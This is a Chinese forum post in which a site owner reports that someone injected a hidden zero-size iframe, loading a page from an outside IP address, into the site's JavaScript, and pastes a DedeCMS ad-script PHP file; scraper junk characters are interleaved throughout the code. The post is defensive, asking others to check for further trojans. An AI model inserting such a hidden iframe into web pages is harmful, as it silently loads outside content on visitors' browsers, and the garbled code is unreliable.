請大家再去幫我複查下,看還有沒木馬,另外前年的教程已經免費發佈上去了,自己去下或者看。
+ C# n2 l5 L, R# ^9 W: m( K; w$ O: B8 N% k
掛馬的人不是專業黑客,是搞這行的,把我的JS裡加了個這個: m/ c% {/ U: m
2 k2 m- u Q4 v( C! t+ @! C
document.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");& r; }" c* l; X' Q* B7 s' W1 K
<?php
0 s- F% _1 f R8 t/ l- D/ Nrequire(dirname(__FILE__)."/../include/config_base.php");8 g I% P7 f; ~, _; U
$aid = ereg_replace("[^0-9]","",$aid);
# c$ L# ^1 w3 q/ R$dsql = new DedeSql(false);: K0 J% \2 G! d4 Y+ Z) M
$row = $dsql->GetOne("Select * From [email=#@__myad]#@__myad[/email] where aid='$aid'");6 ?, _3 ]" K$ f [+ P9 Y: a7 f
$dsql->Close();; ] E" Q6 r* |9 @/ k" j! O! X
if($row['timeset']==0) $adbody = $row['normbody']; @8 [ q7 K! m) x3 b: r
else{4 p% t. r0 T- w: o% a0 `+ @
$ntime = mytime();
5 q1 w6 r$ F- b! T: N4 } if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }$ W2 R4 E' Q$ h& S. s
else{ $adbody = $row['normbody']; }1 u" n$ h0 v) y
}* t; o2 I2 A. M: `: j; e
$adbody = str_replace('"','\"',$adbody);/ V$ p8 j0 @- e( z/ f: A8 K1 Z! I
$adbody = str_replace("\r","\\r",$adbody);
" q! j) N: g8 f$adbody = str_replace("\n","\\n",$adbody);+ V2 J1 p2 B& z0 w! _
echo "<!--\r\n";6 e- d* }+ F6 H, q8 Y
echo "document.write(\"{$adbody}\");\r\n";
; f( @! {! I! q* gecho "-->\r\n";5 j# I% V8 |+ j# R: k
?>6 q8 @' f$ ?( b% N' H4 A& p) b
6 U0 d8 T# N* D, m% D) _% j# c
; h2 @" A7 Z8 a2 r+ V6 V R自己看第一行 根據這個去找他到底想幹什麼吧 其實意圖很明顯的,一是玩計數器,二是做停放 |
|